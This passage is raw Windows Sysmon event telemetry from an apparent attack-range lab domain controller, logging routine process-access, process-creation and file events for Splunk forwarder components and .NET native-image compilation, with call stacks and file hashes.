Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.997{4DB9351A-A1F5-60D3-0D04-00000000CF01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.012{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02F97461717714F97B5ED06DF4AE5E76,SHA256=DDC738EDD797B220B0AE0BC4BAB51F7B085FB072E4F17D849B9C70062D76CE5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.982{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F7-60D3-1704-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.982{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F7-60D3-1704-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1F7-60D3-1604-00000000CF01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1F7-60D3-1604-00000000CF01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1F7-60D3-1604-00000000CF01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.780{4DB9351A-A1F7-60D3-1604-00000000CF01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.951{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D80E669F7F2554D7099F108577E7022,SHA256=EA25C1251787C7FF826F5EF09AB186BED8C1FA09007D715A265D697E66345385,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F7-60D3-1504-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.559{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F7-60D3-1504-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.559{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F7-60D3-1504-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:55.512{4DB9351A-A1F6-60D3-1404-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\280-0\Microsoft.Windows.ServerManager.ServerComponentDeploymentWizard.dll2021-06-23 21:04:55.512 23542300x800000000000000021128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.293{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E43C7E682F1241BD2336A16C19B93E1,SHA256=38944113D7F2634E51C6A518386D4A4B6696994592E962B710EF72A8F1D0C614,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1F6-60D3-1304-00000000CF01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1F6-60D3-1304-00000000CF01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.012{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1F6-60D3-1304-00000000CF01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.888{4DB9351A-A1F6-60D3-1304-00000000CF01}2632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.798{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F8-60D3-1904-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.767{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F8-60D3-1904-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.767{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F8-60D3-1904-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\M